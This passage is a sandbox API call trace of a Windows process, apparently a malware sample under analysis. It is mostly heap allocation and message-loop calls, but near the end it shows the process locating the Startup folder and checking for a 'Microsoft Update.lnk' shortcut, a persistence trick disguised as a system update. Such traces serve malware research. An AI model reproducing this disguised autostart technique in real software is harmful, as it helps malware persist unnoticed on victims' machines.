hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0240.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0240.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0240.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0240.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0240.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0240.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0240.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0240.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0240.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0240.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0240.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0240.328] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865040 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0240.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0240.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0240.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0240.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0240.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0240.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0240.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0240.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0240.410] FreeLibrary (hLibModule=0x76240000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0240.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0240.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38658e0 [0240.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865040 | out: hHeap=0x2af0000) returned 1 [0240.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0240.412] TranslateMessage (lpMsg=0x8cf708) returned 0 [0240.412] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0240.412] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0240.412] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0240.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0240.412] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0240.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0240.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0240.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0240.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0240.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0240.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38658e0 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0240.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0240.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0240.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0240.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0240.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0240.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0240.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0240.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0240.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0240.414] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0240.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0240.414] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0240.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0240.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0240.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0240.415] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0240.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0240.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0240.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0240.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0240.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0240.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0240.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0240.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0240.416] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0240.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0240.416] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0240.416] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0240.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0240.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0240.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0240.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0240.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0240.416] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0240.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0240.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0240.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0240.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0240.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0240.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0240.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0240.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0240.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0240.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0240.417] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0240.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0240.417] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0240.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0240.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0240.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0240.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0240.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 